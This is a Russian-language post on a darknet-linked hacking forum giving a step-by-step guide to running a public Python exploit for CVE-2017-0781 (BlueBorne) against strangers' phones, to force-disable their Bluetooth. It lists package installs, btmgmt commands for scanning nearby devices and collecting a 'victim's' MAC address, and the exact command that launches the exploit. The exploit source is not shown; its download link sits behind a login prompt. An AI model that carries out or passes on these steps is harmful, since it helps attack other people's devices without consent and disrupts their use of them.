Обрубаем любителей face-а на колонках или как отключить Bluetooth на чужом девайсе.

  • Автор темы HHIDE_DUMP
  • Дата начала
  • Просмотры 779
  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
Доброго времени суток. Опять пишу всякие "хацкерские" темы в ночное время суток( по МСК). Ладно, не суть. Сегодня хотел бы рассказать вам об уязвимости, которая известно давно...Просто о ней на время забыли, т.к. не выкладывали exploit...И вот на днях совершилось чудо! На гитхабе выложили скрипт python-а с использованием уязвимости(CVE-2017-0781/ Blueborn).
Суть exploit-а в том, что бы вызвать принуждённое отключение bluetooth на устройстве "жертвы". Грубо говоря, exploit бьёт по уязвимым местам прошивки android( как пишут некоторые люди, ios тоже через раз получается) и вызывает ошибку типа null-byte(переполнение буфера).

UPD: Было лично протестировано на своём телефоне - MEIZU M5 NOTE с обновлённым Flyme OS.

Приступим!

>Первым делом нам нужно установить зависимости скрипта.
Код:
apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential
Затем обновляем модули python.
Код:
pip install --upgrade pip
pip install --upgrade pwntools
Для работы с bluetooth с помощью python нам понадобится модуль pybluez.
Код:
apt-get install bluetooth libbluetooth-dev
pip install pybluez
>Затем приступаем к скачиванию эксплоита(корректней будет назвать скриптом).
Код:
git clone
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

>Дальше нам придётся попотеть...Т.к. проблема может быть следующая:
Не работает bluetooth....Для этого используем утиллиту btmgmt.
Запускаем её и делаем следующие шаги:
Код:
btmgmt --index 0
power
auto-power
find
Если начнется мониторинг Bluetooth устройств - значит всё готово.
>Используем скрипт. Для этого нам нужен MAC-адресс bluetooth устройства(используем команду btmgmt --index 0 и find).
Как только нашли "жертву", вводим команду.
Код:
python CVE-2017-0781.py TARGET=*mac-адресс с заглавными буквами.*
И ждём. Мониторить устройство можете с других или же через консоль.
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2022

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя